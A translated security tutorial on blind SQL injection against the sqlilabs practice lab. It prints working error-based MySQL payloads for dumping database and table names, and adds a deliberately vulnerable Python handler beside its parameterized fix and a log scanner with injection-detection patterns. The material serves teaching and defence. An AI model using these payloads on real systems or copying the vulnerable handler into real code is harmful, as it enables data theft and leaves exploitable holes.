Web Vulnerabilities: Blind SQL Injection
Preface
This article introduces blind SQL injection techniques. Blind injection is used when the front-end page does not echo the result of the SQL statement, for example on a registration page.
Types of blind injection
Error-based blind injection
Error-based blind injection means that although the front end does not echo query results, the data we are after can still be surfaced through the database error message that the page displays. We use less-5 of the sqlilabs range as the example. For installing sqlilabs, see https://blog.csdn.net/qq_44312640/article/details/127573726?spm=1001.2014.3001.5502.
```sql
# Reference: https://www.cnblogs.com/zane-s/articles/12371820.html#w58wxCp4
# Dumping the database name and similar information (the underlying mechanism is not covered here)
# Variant 1:
or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
# Variant 2:
union select concat(floor(rand(0)*2),"===",(select database())) as xx,count(1),3 from information_schema.columns group by xx--+
# Dumping table names and similar information
union select concat(floor(rand(0)*2),"===",(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 3,1)) as xx,count(1),3 from information_schema.columns group by xx--+
# Dumping column names and similar information
```
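The payloads above work only because of two application-side defects: the id is spliced into the SQL text as a string, and the raw database error is sent back to the browser. As an added example (not code from the original article or from sqlilabs), the following Python script models both defects in an in-memory sqlite3 database and places the hardened handler beside them. The table, sample rows, handler names and probe inputs are constructed for this illustration.

```python
"""Added example: the two preconditions of error-based blind injection
(string-spliced SQL and raw DB errors returned to the client) next to the
hardened form. Uses an in-memory sqlite3 database; no network, no MySQL."""
import logging
import sqlite3

log = logging.getLogger("sqli-demo")

GENERIC_ERROR = "request failed"  # constant the hardened handler returns on any DB error


def make_db():
    """Constructed in-memory stand-in for a sqlilabs-style users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")],  # constructed rows
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Hypothetical less-5-style handler.

    The id is spliced into the SQL text, so input can change the statement,
    and whatever the database says about a malformed statement is returned
    verbatim, so the error text becomes an output channel. Together these are
    exactly what error-based blind injection relies on.
    """
    query = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 1"
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        return {"status": "error", "body": str(exc)}  # raw DB error reaches the page
    return {"status": "ok", "body": row[0] if row else ""}


def lookup_hardened(conn, user_id):
    """Same lookup with both preconditions removed.

    The id is bound as a parameter, so it is compared as a value and never
    parsed as SQL; database errors are logged server-side and the client
    only ever sees a constant string.
    """
    try:
        row = conn.execute(
            "SELECT username FROM users WHERE id=? LIMIT 1", (str(user_id),)
        ).fetchone()
    except sqlite3.Error as exc:
        log.warning("database error for id=%r: %s", user_id, exc)
        return {"status": "error", "body": GENERIC_ERROR}
    return {"status": "ok", "body": row[0] if row else ""}


def differential(conn, user_id):
    """Return what each handler reveals for one input, side by side."""
    return {
        "input": user_id,
        "vulnerable": lookup_vulnerable(conn, user_id),
        "hardened": lookup_hardened(conn, user_id),
    }


if __name__ == "__main__":
    db = make_db()
    # A normal id, an unbalanced quote (error channel), and a tautology (injection vector).
    for probe in ("1", "1'", "0' or '1'='1"):
        print(differential(db, probe))
```

Run the script to see that the vulnerable handler answers the unbalanced quote with sqlite's own parser error and answers the tautology with the first row, while the hardened handler returns an empty result for both: the input is compared to the id column as a literal value, and the only error text it can ever emit is the constant. The parameter binding is the actual fix; hiding the error message on its own would only remove the error-based channel and leave the boolean and time-based ones described below.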
Guessing the database name
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102152934330-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102153033723-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102153927422-3.png?raw=true)
Guessing the table names
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102160050485-3.png?raw=true)
Guessing the column names
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102160413151-3.png?raw=true)
Guessing the contents
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102161033854-3.png?raw=true)
Boolean-based blind injection
Boolean-based blind injection appends a condition with a connector such as AND and judges whether the condition holds by observing whether the page renders normally or not. We use less-5 of the sqlilabs range as the example.
Guessing the database name
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102161724021-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162001012-3.png?raw=true)
Guessing the table names
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162101171-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162145197-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162508846-3.png?raw=true)
Guessing the column names
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162624397-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162716981-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162813842-3.png?raw=true)
Guessing the contents
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102163052626-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102163010532-3.png?raw=true)
Time-based (delay) injection
Time-based injection works much like boolean-based injection: a delay function is injected under a condition, and the page's response time shows whether the condition holds. We use less-5 of the sqlilabs range as the example. The remaining steps follow by analogy with boolean-based blind injection.
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102163554096-3.png?raw=true)
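On the defending side, all three blind-injection families leave recognisable traces in web server access logs. As an added example that is not part of the original article, the following Python scanner decodes the query string of constructed access-log lines and flags the error-based `floor(rand())` with `group by` construction shown above, boolean conditions of the `and N=N` form, and delay functions such as MySQL's `sleep()`. The log lines, client addresses and pattern names are constructed for this illustration; signature matching like this is a detection aid that encoding variations can evade, not a substitute for parameterized queries.

```python
"""Added example: flag blind SQL injection payload families in access-log lines."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines in the common log format. The requests
# mirror the payload shapes discussed above; the addresses are invented.
LOG_LINES = [
    '10.0.0.5 - - [02/Nov/2022:15:29:34 +0800] "GET /Less-5/?id=1 HTTP/1.1" 200 712',
    '10.0.0.5 - - [02/Nov/2022:15:30:33 +0800] "GET /Less-5/?id=1%27%20and%201%3D1--%2B HTTP/1.1" 200 712',
    '10.0.0.5 - - [02/Nov/2022:15:30:41 +0800] "GET /Less-5/?id=1%27%20and%20sleep(5)--%2B HTTP/1.1" 200 712',
    '10.0.0.5 - - [02/Nov/2022:16:00:50 +0800] "GET /Less-5/?id=1%27%20union%20select%20concat(floor(rand(0)*2),%22===%22,(select%20database()))%20as%20xx,count(1),3%20from%20information_schema.columns%20group%20by%20xx--%2B HTTP/1.1" 500 301',
    '10.0.0.9 - - [02/Nov/2022:16:01:12 +0800] "GET /Less-5/?id=2 HTTP/1.1" 200 712',
]

# One compiled pattern per payload family, applied to the lower-cased, decoded query string.
FAMILIES = {
    # duplicate-key trick: floor(rand()) inside a group by, or the XML error functions
    "error_based": re.compile(r"floor\s*\(\s*rand\s*\(|\bextractvalue\s*\(|\bupdatexml\s*\("),
    # a numeric tautology/contradiction joined with and/or, or character-probing functions
    "boolean_based": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+|\b(?:substr|substring|ascii|mid|length)\s*\("),
    # MySQL delay primitives
    "time_based": re.compile(r"\bsleep\s*\(|\bbenchmark\s*\("),
    # reads of the catalogue, which all three families use to enumerate names
    "schema_enumeration": re.compile(r"information_schema"),
}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')


def decoded_query(line):
    """Extract the request target from a log line and return its decoded query string."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    # '+' and %XX are both decoded, so the trailing '--+' becomes '-- ' as the server saw it
    return unquote_plus(urlsplit(match.group(1)).query).lower()


def classify(query):
    """Return the set of payload families whose signature appears in the query."""
    return {name for name, pattern in FAMILIES.items() if pattern.search(query)}


def scan_log(lines):
    """Return one finding per line that matched at least one family (1-based line numbers)."""
    findings = []
    for index, line in enumerate(lines, start=1):
        query = decoded_query(line)
        if query is None:
            continue
        families = classify(query)
        if families:
            findings.append({"line_no": index, "families": families, "query": query})
    return findings


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding["line_no"], sorted(finding["families"]), finding["query"])
```

Decoding before matching matters: the payloads arrive percent-encoded, and the `--+` comment terminator only becomes the `-- ` that the database saw after the `+` is turned back into a space. For time-based probing, the request line alone cannot show the delay, so correlating these matches with the server's response-time field (where the log format records one) is the natural next check.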